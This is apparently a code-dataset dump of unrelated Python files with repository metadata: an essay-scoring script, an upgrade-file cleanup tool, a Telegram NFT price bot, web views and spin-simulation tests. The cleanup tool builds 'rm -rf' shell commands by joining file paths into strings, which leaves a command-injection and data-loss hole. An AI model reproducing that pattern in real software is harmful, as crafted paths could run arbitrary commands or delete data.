#grammarCheckerApp = gateway.entry_point
#End
print "\'ESSAY EVALUATOR\'\n\n"
'''LSA Initialization'''
stopwords = ['a','an','the','to','for','in','on','up','down','at','before','after','above','below','under','over','what','when','who','how','why','which','where','if','so','but','and','otherwise','however','hence','therefore','that','he','she','it','they','each','every','all','you','I','we','him','her','us','my','mine','is','was','were','are','am','will','shall','may','might','can','could','should','would','do','did','does','done','has','have','had','again']
ignorechars = ''',:'!'''
print "\nInitializing LSA Procedure..."
lsaObj = LSA(stopwords, ignorechars)
print "Building Word By Document Matrix..."
lsaObj.build()
#lsaObj.printA()
print "\nBuilding LSA Model..."
lsaObj.calc()
print "\nLSA Model Ready"
lsaObj.printSVD()
def returnPOSTaggedWords(text):
output={"CC":0,"CD":0,"DT":0,"EX":0,"FW":0,"IN":0,"JJ":0,"JJR":0,"JJS":0,"LS":0,"MD":0,"NN":0,"NNP":0,"NNPS":0,"NNS":0,"PDT":0,"POS":0,"PRP":0,"PRP$":0,"RB":0,"RBR":0,"RBS":0,"RP":0,"SYM":0,"TO":0,"UH":0,"VB":0,"VBD":0,"VBG":0,"VBN":0,"VBP":0,"VBZ":0,"WDT":0,"WP":0,"WP$":0,"WRB":0,"#":0,"$":0,"''":0,"(":0,")":0,",":0,".":0,":":0,"''":0,"-NONE-":0,"``":0}
tokens=wordpunct_tokenize(text)
tagged=pos_tag(tokens)
for word,pos in tagged:
output[pos]=output[pos]+1
return output
def returnNounCount(TaggedWords):
return (TaggedWords["NN"]+TaggedWords["NNP"]+TaggedWords["NNPS"]+TaggedWords["NNS"])
def returnVerbCount(TaggedWords):
return (TaggedWords["VB"]+TaggedWords["VBD"]+TaggedWords["VBG"]+TaggedWords["VBN"]+TaggedWords["VBP"]+TaggedWords["VBZ"])
def returnAdjectiveCount(TaggedWords):
return (TaggedWords["JJ"]+TaggedWords["JJS"]+TaggedWords["JJR"])
def returnAdverbCount(TaggedWords):
return (TaggedWords["RB"]+TaggedWords["RBR"]+TaggedWords["RBS"])
def returnWordCount(essay):
return len(re.split(r'[^0-9A-Za-z]+',essay))
def returnSentenceCount(essay):
return len(re.split(r'[.!?]+', essay))
def returnCommaCount(essay):
return essay.count(',')
"""
def returnSpellingScore(text):
ignorechars = ''',:.;'?!'''
dictionary=enchant.Dict("en_US")
words = re.findall(r"(?i)\b[a-z]+\b", text)
totalno=0.0
score=0.0
for w in words:
w = w.translate(None, ignorechars)
if dictionary.check(w)==True:
score=score+1;
totalno=totalno+1
percentage=score/totalno;
return percentage * 10
def returnGrammarScore(essay):
return grammarCheckerApp.returnScore(essay)
"""
def evaluateEssay(essay,coeff):
m1=coeff[0]
m2=coeff[1]
m3=coeff[2]
m4=coeff[3]
m5=coeff[4]
m6=coeff[5]
m7=coeff[6]
m8=coeff[7]
#m9=coeff[8]
#wGrammarScore = coeff[9]
c=coeff[8]
TaggedWords = returnPOSTaggedWords(essay)
wordCount=returnWordCount(essay)*1.0
adjCount=(returnAdjectiveCount(TaggedWords)/wordCount) * 100
advCount=(returnAdverbCount(TaggedWords)/wordCount) * 100
nounCount=(returnNounCount(TaggedWords)/wordCount) * 100
verbCount=(returnVerbCount(TaggedWords)/wordCount) * 100
sentenceCount=returnSentenceCount(essay)
commaCount=returnCommaCount(essay)
coherenceScore=lsaObj.calculateCoherence(essay) * 100
#spellingScore = returnSpellingScore(essay)
#grammarScore = returnGrammarScore(essay)
print "\n\nEvaluating Essay...\n"
print "Adjective Count -> ",adjCount
print "Adverb Count -> ",advCount
print "Noun Count -> ",nounCount
print "Verb Count -> ",verbCount
print "Word Count -> ",wordCount
print "Sentence Count -> ",sentenceCount
print "Comma Count -> ",commaCount
print "Average Coherence ->",coherenceScore
#print "Spelling Score ->",spellingScore
#print "Grammar Score ->",grammarScore
predicted_score=c+(m1*adjCount)+(m2*advCount)+(m3*nounCount)+(m4*verbCount)+(m5*wordCount)+(m6*sentenceCount)+(m7*commaCount)+(m8*coherenceScore)
print "Predicted Score of Essay --> ", predicted_score
def main():
print "\nReading Essays and Building Regression Model...\n"
csvfile=csv.reader(open("training_set_rel3.csv","rb")) #Opens csv file
i=0;
count=0
essays=[]
grades=[]
for row in csvfile: #Reads the 1st 10 records
if i==0:
i=i+1
continue
if i==10:
break
else:
essays.append(row[2]) #3rd column in the sheet has the essay
grades.append(row[6]) #7th column has the cumulative grade
count=count+1;
i=i+1
g=0
essayGrades=[]
arrayVariable1=[]
arrayVariable2=[]
arrayVariable3=[]
arrayVariable4=[]
arrayVariable5=[]
arrayVariable6=[]
arrayVariable7=[]
arrayVariableLSACoherence = []
#arrayVariableSpellingScore = []
#arrayVariableGrammarScore=[]
for essay in essays:
print "Reading Essay %d ..." % (g+1)
output = returnPOSTaggedWords(essay)
grade=grades[g]
g=g+1
essayGrades.append(grade)
wordCount = returnWordCount(essay) *1.0
adjective=(returnAdjectiveCount(output)/wordCount) * 100
adverb=(returnAdverbCount(output)/wordCount) * 100
noun=(returnNounCount(output)/wordCount) * 100
verb=(returnVerbCount(output)/wordCount) * 100
sentenceCount = returnSentenceCount(essay)
commaCount = returnCommaCount(essay)
coherenceScore = lsaObj.calculateCoherence(essay) * 100
#spellingScore = returnSpellingScore(essay)
#grammarScore = returnGrammarScore(essay)
arrayVariable1.append(adjective)
arrayVariable2.append(adverb)
arrayVariable3.append(noun)
arrayVariable4.append(verb)
arrayVariable5.append(wordCount)
arrayVariable6.append(sentenceCount)
arrayVariable7.append(commaCount)
arrayVariableLSACoherence.append(coherenceScore)
#arrayVariableSpellingScore.append(spellingScore)
#arrayVariableGrammarScore.append(grammarScore)
print "\nApplying Regression...\n"
x = np.array([arrayVariable1, arrayVariable2, arrayVariable3, arrayVariable4, arrayVariable5, arrayVariable6, arrayVariable7, arrayVariableLSACoherence], np.int32)
y=np.array(essayGrades) #Array for the assigned grades
nn = np.max(x.shape)
X = np.vstack([x,np.ones(nn)]).T #Preparing for regression function
print X
print y
coeff = np.linalg.lstsq(X, y)[0]
print coeff
print "\nAdj Count Weight--> ", coeff[0]
print "Adv Count Weight--> ", coeff[1]
print "Noun Count Weight--> ", coeff[2]
print "Verb Count Weight--> ", coeff[3]
print "Word Count Weight--> ", coeff[4]
print "Sentence Count Weight--> ", coeff[5]
print "Comma Count Weight--> ", coeff[6]
print "Average Coherence Weight--> ", coeff[7]
#print "Spelling Score Weight, --> ", coeff[8]
#print "Grammar Score Weight, --> ", coeff[9]
print "Fitted Line's Constant Value, c --> ", coeff[8]
# plt.plot(arrayVariable1, y, 'o', label='Original data', markersize=10) #Plotting graphically
# plt.plot(arrayVariable1, coeff[0]*arrayVariable1 + coeff[2], 'r', label='Fitted line')
# plt.xlabel('Kappa Value')
# plt.ylabel('Score')
# plt.legend()
# plt.show()
#
print "\nEVALUATION MODEL READY\n"
print "Evaluating essay..."
#This is the target essay. Row no 15th on the sheet
filename = "testEssays.txt"
while filename != 'exit':
with open(filename) as fp:
for line in fp:
testText = line
evaluateEssay(testText,coeff)
filename = raw_input("\nEnter filename or type \'exit\' to exit: ")
if __name__ == '__main__':
main()
|
[
"ganzse7en@gmail.com"
] |
ganzse7en@gmail.com
|
7fbc0b70a1d798c7fa7d95d7619db076660ac08c
|
c957a774fc496f4e2e48a84c44af47ff763dbdee
|
/rmupgrade.py
|
a80a9c836d7bb1abd4e5d53b7825da073db52352
|
[] |
no_license
|
lfyhex/PythoneQtLanguage
|
acdd536ef630ac4aafcae8c68b80edeaa809063d
|
2e554eeb0ab3cc45a09c27c5e7c6f9eb698501b5
|
refs/heads/master
| 2021-01-19T04:50:15.660166
| 2017-02-04T07:15:02
| 2017-02-04T07:15:02
| 50,153,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,419
|
py
|
import os
import sys
from datetime import datetime
from datetime import timedelta
import time
import re
"""
list upgrade files and dirs
"""
def exactVersion(strFile):
ma=re.search(r'[\d]+\.[\d]+\.[\d]+', strFile)
return ma.group(0)
def max_version(v1, v2):
lstV1 = v1.split(".")
lstV2 = v2.split(".")
ret = 0
for d in range(len(lstV1)):
intV1 = int(lstV1[d])
intV2 = int(lstV2[d])
if intV1 > intV2:
ret = 1
break
elif intV1 < intV2:
ret = -1
break
return ret
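# Minimal self-check sketch for the two helpers above (illustrative file name;
# assumes version strings of the form X.Y.Z embedded in the name):
assert exactVersion("app_upgrade_1.2.10.dmg") == "1.2.10"
assert max_version("1.2.10", "1.2.9") == 1
assert max_version("1.2.9", "1.2.10") == -1
assert max_version("1.2.9", "1.2.9") == 0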
def classification_max_versions(lst):
odd_versions = set([])
even_versions = set([])
for f in lst:
if '_upgrade' in f:
strV = exactVersion(f)
last_char = strV[-1]
n = int(last_char)
if n % 2 == 0:
even_versions.add(strV)
else:
odd_versions.add(strV)
odd_max = "0.0.0"
even_max = "0.0.0"
for s in odd_versions:
cmp_res = max_version(s, odd_max)
if (cmp_res == 1):
odd_max = s
for s in even_versions:
cmp_res = max_version(s, even_max)
if (cmp_res == 1):
even_max = s
res = []
if (len(odd_max)):
res.append(odd_max)
if (len(even_max)):
res.append(even_max)
return res
def list_upgrade(fpath, lst):
if not os.path.exists(fpath):
print(fpath + " is not exits!!!")
return
absfpath = os.path.abspath(fpath)
cur_date = datetime.now()
lstfiles = os.listdir(absfpath)
max_versions = classification_max_versions(lstfiles)
for f in lstfiles:
newpath = absfpath + '/' + f
if '_upgrade' in f:
strV = exactVersion(f)
if strV in max_versions:
continue
            # only collect files created more than two months (60 days) ago
stat_info = os.stat(newpath)
stat_date = datetime.fromtimestamp(stat_info.st_ctime)
t_date = stat_date + timedelta(60)
if (cur_date > t_date):
print('----append path----' + newpath)
lst.append(newpath)
else:
                print('*********upgrade below two months*********')
print(f)
else:
if f.endswith('.app'):
print('not into app contents')
elif os.path.isdir(newpath):
print('go to sub dir' + newpath)
list_upgrade(newpath, lst)
def rm_files(lstPath):
for ipath in lstPath:
        if os.path.exists(ipath):
            os.system('rm -rf ' + ipath)
if __name__=="__main__":
argvs = sys.argv
if len(argvs) == 3:
if argvs[1] == 'rm':
inputFile = open(argvs[2], 'r')
for l in inputFile:
rmfilepath = l.strip()
if os.path.exists(rmfilepath):
print('remove ' + rmfilepath)
os.system('rm -rf ' + '"' + rmfilepath + '"')
elif argvs[1] == 'list':
lstret = []
list_upgrade(argvs[2], lstret)
fresult = open('list_result.txt', 'w')
print('----start print result----')
for i in lstret:
print(i)
fresult.write(i)
fresult.write("\n")
fresult.flush()
print('----end----')
else:
print("usage: list | rm file path")
|
[
"lfy_hex@hotmail.com"
] |
lfy_hex@hotmail.com
|
5b1263a6ea43e9710528b7ab437313e5f610b2c1
|
ab7a88e309012b2219dd6ef12c0ab51576941577
|
/venv36/Scripts/pip3.6-script.py
|
fd22bdd9cb0dc4e7980a8bae4e08d2aad1af6f03
|
[] |
no_license
|
fly904021125/PythonSecondDemo
|
745b9f56e00d9032c184be7e098eab819aa596c1
|
8ad79cdb3628fcfde0dd7f919f9480dab4d361be
|
refs/heads/master
| 2020-03-18T05:31:41.576626
| 2018-05-22T02:02:43
| 2018-05-22T02:02:43
| 134,346,930
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
#!D:\PycharmProjects\SecondDemo\venv36\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3.6'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3.6')()
)
|
[
"fly904021125@126.com"
] |
fly904021125@126.com
|
cfd71321999d2657b65392a548166bb813ef5305
|
2f4b7a0d28ee01c9c08f4f014ba7e2e073997cbb
|
/rustkr/models/log.py
|
57ca6d4c4f6fe78facae95d27a7ba12c4fc73918
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
Niev/rust-kr
|
cbb025d0383e401e2b55a19492c28a971788d08f
|
de91097f1451e9c0a81bbaf64463311d3cc8ff1b
|
refs/heads/master
| 2020-12-25T12:57:04.406467
| 2013-05-09T15:07:03
| 2013-05-09T15:14:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 532
|
py
|
import threading
import settings
class Subscriber(threading.Thread):
def __init__(self, redis):
self.pubsub = redis.pubsub()
self.pubsub.subscribe(settings.CHANNEL + 'out')
self.result = None
threading.Thread.__init__(self)
def run(self):
self.listener = self.pubsub.listen()
while True:
message = self.listener.next()
if message['type'] == 'subscribe':
continue
self.result = message['data']
break
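# Minimal usage sketch (an assumption, not part of the original module): it
# presumes a reachable Redis server and some other process publishing to
# settings.CHANNEL + 'out'.
#
#   import redis
#   sub = Subscriber(redis.StrictRedis())
#   sub.start()          # listen in the background
#   sub.join()           # blocks until the first payload arrives
#   print(sub.result)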
|
[
"jeong@youknowone.org"
] |
jeong@youknowone.org
|
fc24c8baef943aac4ef7d865c9a7d271421a0716
|
3c13fbde9fba1070877fb4cd49dae6e8ea2ada14
|
/main.py
|
991418fca57a4a8a50bc5f51fea57c216f42b8b2
|
[] |
no_license
|
GregorAilario/NFT_monitoring_bot
|
0c0dafcff9f730347f77b977fa0b94a9eb2cf00a
|
79507407d937f20722f8fc49127601e13995bfd7
|
refs/heads/master
| 2023-08-22T04:13:45.600517
| 2021-10-22T14:23:51
| 2021-10-22T14:23:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,337
|
py
|
import asyncio
import aiohttp
from aiogram import Bot, Dispatcher, types
from aiogram.utils import executor
from loguru import logger
from sqliter import SQLighter
from utils import get_floor_price_nft
COLLECTION_URL = 'https://qzlsklfacc.medianetwork.cloud/nft_for_sale?collection=%s'
NFT_URL = 'https://solanart.io/search/?token=%s'
logger.add('app.log', format="{time:YYYY-MM-DD HH:mm:ss} | {level} | {message}")
bot = Bot(token='BOT_TOKEN') # <- Your telegram bot token
dp = Dispatcher(bot)
db = SQLighter('nft_collection')
@logger.catch
@dp.message_handler(commands=['watchlist'])
async def show_watchlist(message: types.Message):
logger.info('Show watchlist')
watchlist = db.get_watchlist(message.chat.id)
result = 'Watchlist:\n\n'
for el in watchlist:
if el[2]: # started or not
result += f'{el[0]} - max price {el[1]}\n'
else:
result += f'{el[0]} - not started\n'
await message.answer(result)
@logger.catch
@dp.message_handler(commands=['add'])
async def add_collection(message: types.Message):
logger.info('Adding collection')
collection_name = message.get_args()
if len(collection_name.split()) != 1:
await message.answer('Invalid cmd call!\nExample:\n/add coll_name')
return
collection = await fetch_collection(collection_name)
if type(collection) is not list:
await message.answer('Invalid collection name!')
return
if db.collection_exists(collection_name, message.chat.id):
await message.answer('The collection has already been added!')
return
db.add_collection(collection_name, message.chat.id)
logger.info(f'{collection_name} collection added')
await message.answer(f'{collection_name} collection added!')
@logger.catch
@dp.message_handler(commands=['del'])
async def del_collection(message: types.Message):
logger.info('Delete collection')
collection_name = message.get_args()
if len(collection_name.split()) != 1:
await message.answer('Invalid cmd call!\nExample:\n/del coll_name')
return
if not db.collection_exists(collection_name, message.chat.id):
await message.answer('Collection does not exist in watchlist!')
return
db.delete_collection(collection_name, message.chat.id)
logger.info(f'{collection_name} collection deleted')
await message.answer('Collection deleted!')
@logger.catch
@dp.message_handler(commands=['start'])
async def start_watch(message: types.Message):
logger.info('Start watch')
args = message.get_args().split()
if len(args) != 2:
await message.answer('Invalid cmd call!\nExample:\n/start coll_name max_price')
return
if not db.collection_exists(args[0], message.chat.id):
collection = await fetch_collection(args[0])
if type(collection) is not list:
await message.answer('Invalid collection name!')
return
db.add_collection(args[0], message.chat.id)
if not args[1].replace('.', '', 1).isdigit():
await message.answer('Invalid price format')
return
db.start_watch(args[0], args[1], message.chat.id)
logger.info(f'Started watching {args[0]} with max price {args[1]}')
await message.answer(f'{args[0]} started with max price {args[1]}')
@logger.catch
@dp.message_handler(commands=['stop'])
async def stop_watch(message: types.Message):
logger.info('Stop watch')
collection_name = message.get_args()
if len(collection_name) == 0:
logger.info('Stop all alerts')
db.stop_all(message.chat.id)
await message.answer('All alerts stopped!')
return
if len(collection_name.split()) > 1:
await message.answer('Invalid cmd call!\nExample:\n/stop coll_name')
return
if not db.collection_exists(collection_name, message.chat.id):
await message.answer('Collection does not exist in watchlist!')
return
db.stop_watch(collection_name, message.chat.id)
logger.info(f'Stopped watching {collection_name}')
await message.answer(f'{collection_name} stopped!')
@logger.catch
async def monitor():
logger.info('Monitoring started')
while True:
collections = db.get_collections()
for collection in collections:
name, chat_id, max_price, last_nft_id = collection
res = await fetch_collection(name)
floor_price_nft = get_floor_price_nft(res)
if floor_price_nft['price'] <= max_price and floor_price_nft['id'] != last_nft_id:
db.update_last_nft_id(name, chat_id, floor_price_nft['id'])
logger.info(f'NEW NFT ALERT: {floor_price_nft}')
await bot.send_message(chat_id, NFT_URL % floor_price_nft['token_add'])
await asyncio.sleep(20)
await asyncio.sleep(10)
async def on_bot_start_up(dispatcher: Dispatcher) -> None:
"""List of actions which should be done before bot start"""
asyncio.create_task(monitor())
@logger.catch
async def fetch_collection(name):
    async with aiohttp.ClientSession() as session:
        async with session.get(COLLECTION_URL % name) as res:
            collection = await res.json()
    return collection
if __name__ == '__main__':
executor.start_polling(dp, skip_updates=True, on_startup=on_bot_start_up)
|
[
"akmal.melibaev@gmail.com"
] |
akmal.melibaev@gmail.com
|
1b9599c265bef331503dca3eee9e49cf141f9426
|
94ba3fd8075e7358935816913a7c7fe2757cf8c2
|
/muspinsim/tests/test_celio.py
|
a6a554e646a983aa4cefa0bf04f111b476a97a35
|
[
"MIT"
] |
permissive
|
muon-spectroscopy-computational-project/muspinsim
|
c7ea505f082a6ef2ad5787aa43340821d96a6c18
|
e57dfd3420150ec749cba589e51f72f83d06e30a
|
refs/heads/main
| 2023-06-22T00:59:15.851277
| 2023-04-04T15:12:11
| 2023-04-04T15:12:11
| 330,638,091
| 2
| 1
|
MIT
| 2023-06-20T15:42:53
| 2021-01-18T10:59:14
|
Python
|
UTF-8
|
Python
| false
| false
| 5,734
|
py
|
import unittest
import numpy as np
from muspinsim.cpp import Celio_EvolveContrib
from muspinsim.celio import CelioHamiltonian
from muspinsim.spinop import DensityOperator
from muspinsim.spinsys import MuonSpinSystem, SingleTerm, SpinSystem
class TestCelioHamiltonian(unittest.TestCase):
def test_sum(self):
ssys = SpinSystem(["mu", "e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
extra_terms = [SingleTerm(ssys, 1, [0, 1, 0])]
H2 = CelioHamiltonian(extra_terms, 10, ssys)
H_sum = ssys.hamiltonian + H2
self.assertEqual(H_sum._terms[1], extra_terms[0])
def test_calc_H_contribs(self):
ssys = SpinSystem(["mu", "F", ("e", 2)], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0])
ssys.add_bilinear_term(0, 1, [[0, 0, 1], [0, 0, 1], [0, 0, 1]])
ssys.add_bilinear_term(0, 2, [[0, 0, -1], [0, 0, -1], [0, 0, -1]])
H = ssys.hamiltonian
H_contribs = H._calc_H_contribs()
self.assertEqual(len(H_contribs), 3)
def check_H_contrib(
H_contrib, matrix, other_dimension, spin_order, spin_dimensions
):
self.assertTrue(np.allclose(H_contrib.matrix.toarray(), matrix))
self.assertEqual(H_contrib.other_dimension, other_dimension)
self.assertTrue(np.allclose(H_contrib.spin_order, spin_order))
self.assertTrue(np.allclose(H_contrib.spin_dimensions, spin_dimensions))
check_H_contrib(
H_contrib=H_contribs[0],
matrix=[[0, 0.5], [0.5, 0]],
other_dimension=6,
spin_order=[0, 1, 2],
spin_dimensions=[2, 2, 3],
)
check_H_contrib(
H_contrib=H_contribs[1],
matrix=[
[0.25, 0, 0.25 - 0.25j, 0],
[0, -0.25, 0, -0.25 + 0.25j],
[0.25 + 0.25j, 0, -0.25, 0],
[0, -0.25 - 0.25j, 0, 0.25],
],
other_dimension=3,
spin_order=[0, 1, 2],
spin_dimensions=[2, 2, 3],
)
check_H_contrib(
H_contrib=H_contribs[2],
matrix=[
[-0.5, 0, 0, -0.5 + 0.5j, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0.5, 0, 0, 0.5 - 0.5j],
[-0.5 - 0.5j, 0, 0, 0.5, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0.5 + 0.5j, 0, 0, -0.5],
],
other_dimension=2,
spin_order=[0, 2, 1],
spin_dimensions=[2, 3, 2],
)
def test_calc_trotter_evol_op(self):
ssys = SpinSystem(["mu", "e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0])
H = ssys.hamiltonian
evol_op_contribs = H._calc_trotter_evol_op_contribs(1, False)
self.assertEqual(len(evol_op_contribs), 1)
self.assertTrue(
np.allclose(
evol_op_contribs[0].toarray(),
[
[0.95105652, 0, -0.30901699j, 0],
[0, 0.95105652, 0, -0.30901699j],
[-0.30901699j, 0, 0.95105652, 0],
[0, -0.30901699j, 0, 0.95105652],
],
)
)
# Should be 2x2 for the fast variant
ssys = SpinSystem(["mu", "e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0])
H = ssys.hamiltonian
evol_op_contribs = H._calc_trotter_evol_op_contribs(1, True)
self.assertEqual(len(evol_op_contribs), 1)
self.assertTrue(isinstance(evol_op_contribs[0], Celio_EvolveContrib))
self.assertTrue(
np.allclose(
evol_op_contribs[0].matrix,
[
[0.95105652, -0.30901699j],
[-0.30901699j, 0.95105652],
],
)
)
self.assertEqual(evol_op_contribs[0].other_dim, 2)
self.assertTrue(np.allclose(evol_op_contribs[0].indices, [0, 1, 2, 3]))
def test_evolve(self):
ssys = SpinSystem(["e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
H = ssys.hamiltonian
rho0 = DensityOperator.from_vectors() # Start along z
t = np.linspace(0, 1, 100)
self.assertTrue(isinstance(H, CelioHamiltonian))
evol = H.evolve(rho0, t, [ssys.operator({0: "z"})])
self.assertTrue(np.all(np.isclose(evol[:, 0], 0.5 * np.cos(2 * np.pi * t))))
def test_evolve_invalid(self):
ssys = SpinSystem(["e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
H = ssys.hamiltonian
rho0 = DensityOperator.from_vectors() # Start along z
t = np.linspace(0, 1, 100)
# No SpinOperator
with self.assertRaises(ValueError):
H.evolve(rho0, t, [])
def test_fast_evolve(self):
ssys = MuonSpinSystem(["mu", "e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
H = ssys.hamiltonian
t = np.linspace(0, 1, 100)
self.assertTrue(isinstance(H, CelioHamiltonian))
# Start along z
evol = H.fast_evolve(ssys.sigma_mu([0, 0, 1]), t, 10)
# This test is subject to randomness, but np.isclose appears to avoid
# any issues
self.assertTrue(np.all(np.isclose(evol[:], 0.5 * np.cos(2 * np.pi * t))))
def test_integrate(self):
ssys = SpinSystem(["e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
H = ssys.hamiltonian
rho0 = DensityOperator.from_vectors() # Start along z
with self.assertRaises(NotImplementedError):
H.integrate_decaying(rho0, 1.0, ssys.operator({0: "z"}))
|
[
"joel.davies@stfc.ac.uk"
] |
joel.davies@stfc.ac.uk
|
6ed21186021b770676ebbd1275689ead2808d4fb
|
f3aed9aa1eca9bc39c6efbf034aa53badd4da4dc
|
/impuesto_renta/views.py
|
7be50695f277985613ca37279fdf6ba1426a777c
|
[] |
no_license
|
erickvh/payroll-app
|
f745a7514fc66095600d25c662b52792ea5813fa
|
6c597581eea78c40209cbe05acc6f36d97d77dd2
|
refs/heads/master
| 2023-02-03T10:56:25.433749
| 2020-06-26T22:51:31
| 2020-06-26T22:51:31
| 256,535,061
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,140
|
py
|
from django.http import HttpResponse
from django.template import loader
from django.http import Http404
from django.shortcuts import get_object_or_404,render,redirect
from django.contrib import messages
#imports del modelo
from .models import ImpuestoRenta
from .forms import RentaForm
# Create your views here.
def index_renta(request):
renta_list = ImpuestoRenta.objects.all().order_by('id')
return render(request, 'impuesto_renta/index.html', {'renta_list': renta_list})
def edit_renta(request,renta_id):
renta = get_object_or_404(ImpuestoRenta,pk=renta_id)
return render(request, 'impuesto_renta/edit.html', {'renta': renta})
def update_renta(request, renta_id):
renta = get_object_or_404(ImpuestoRenta,pk=renta_id)
if request.method == 'POST':
form = RentaForm(request.POST, instance=renta)
if form.is_valid():
form.save()
messages.success(request, 'Impuesto de Renta actualizado correctamente')
else:
errors=form.errors
return render(request, 'impuesto_renta/edit.html',{'errors': errors, 'renta':renta})
return redirect('/renta')
|
[
"zoilavillatoro6694@outlook.com"
] |
zoilavillatoro6694@outlook.com
|
54d25836e06aa3d8d4aa4b989e5f43d916beaea0
|
7400e1d7ff7145ea8c136e955f36aa1edbc37415
|
/groupwise-2.0/project/home/views.py
|
40efbbc2ddbbbfaea2a515d4bfdf0d49001f5688
|
[] |
no_license
|
Dai0526/ASE-Fall2016
|
f62d48e67b1da8fdde2a44f25f51e7adea0d1ada
|
be87c528ff7b72d9e47e1aa2ef6a2f60e4409f44
|
refs/heads/master
| 2021-01-12T15:16:31.719304
| 2016-12-16T17:15:22
| 2016-12-16T17:15:22
| 69,819,155
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,898
|
py
|
# imports
from datetime import datetime
from flask import Flask, request, session, url_for, redirect, \
render_template, abort, g, flash, _app_ctx_stack,make_response, Response, Blueprint
from functools import wraps
from flask_bootstrap import Bootstrap
from project import db
from project.models import *
# config
home_blueprint = Blueprint(
'home', __name__,
template_folder='templates'
)
@home_blueprint.before_request
def before_request():
g.user = None
if 'user_id' in session:
g.user = db.session.query(User).filter_by(id=session['user_id']).first()
# login required decorator
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'user_id' in session:
return f(*args, **kwargs)
else:
flash('You need to login first.')
return redirect(url_for('users.login'))
return wrap
# use decorators to link the function to a url
@home_blueprint.route('/', methods=['GET', 'POST'])
def index():
"""Shows a users timeline or if no user is logged in it will
redirect to the public timeline. This timeline shows the user's
messages as well as all the messages of followed users.
"""
# if 'user_id' not in session:
# return render_template('/login.html', error="please login first")
if not g.user:
return redirect(url_for('home.public_timeline'))
messages = db.session.query(Message).filter_by(author_id=session['user_id']).order_by(Message.pub_date.desc()).limit(30).all()
resp = make_response(render_template('pub_timeline.html', messages=messages))
# resp.headers.add('Cache-Control','no-store,no-cache,must-revalidate,post-check=0,pre-check=0')
return resp
@home_blueprint.route('/public')
def public_timeline():
"""Displays the latest messages of all users."""
messages = db.session.query(Message).order_by(Message.pub_date.desc()).limit(30).all()
return render_template('pub_timeline.html', messages=messages)
@home_blueprint.route('/my_timeline', methods=['GET', 'POST'])
def timeline():
"""Shows a users timeline or if no user is logged in it will
redirect to the public timeline. This timeline shows the user's
messages as well as all the messages of followed users.
"""
if 'user_id' not in session:
return render_template('/login.html', error="please login first")
if not g.user:
return redirect(url_for('home.public_timeline'))
messages = db.session.query(Message).filter_by(author_id=session['user_id']).order_by(Message.pub_date.desc()).limit(30).all()
resp = make_response(render_template('timeline.html', messages=messages))
resp.headers.add('Cache-Control', 'no-store,no-cache,must-revalidate,post-check=0,pre-check=0')
return resp
@home_blueprint.route('/add_message', methods=['POST'])
@login_required
def add_message():
"""
Registers a new message for the user.
"""
if not g.user:
abort(401)
if request.form['text']:
new_message = Message(request.form['text'], session['user_id'])
db.session.add(new_message)
db.session.commit()
flash('Your message was recorded')
return redirect(url_for('home.timeline'))
@home_blueprint.route('/<username>')
def user_timeline(username):
    """Displays a user's tweets."""
    if 'user_id' not in session:
        return render_template('/login.html', error="please login first")
profile_user = db.session.query(User).filter_by(username=username).first()
if profile_user is None:
abort(404)
messages = db.session.query(Message).filter_by(author_id=profile_user.id).order_by(Message.pub_date.desc()).limit(30).all()
resp = make_response(render_template('timeline.html', messages=messages, profile_user=profile_user))
resp.headers.add('Cache-Control','no-store,no-cache,must-revalidate,post-check=0,pre-check=0')
return resp
|
[
"tianhuaf0526@gmail.com"
] |
tianhuaf0526@gmail.com
|
293314d10f984b9284cc3e7c53b2b9ee5673aa61
|
14d35eccfca51ab90ba7a0529993cd5c9ed6218a
|
/template/variables/datafeed_incidents/development_variables.py
|
dade9a112e6f9250b8a1eb46b4e5e7c73d4077a9
|
[] |
no_license
|
gparrar/testing_framework
|
823645f858e134b246d61be927ac949acfdd09ac
|
e4bc60da78605fa2aa72b74eadedd2a16b18db2a
|
refs/heads/master
| 2023-01-12T12:54:15.739716
| 2019-06-26T22:53:04
| 2019-06-26T22:53:04
| 193,987,584
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,344
|
py
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
# Environment
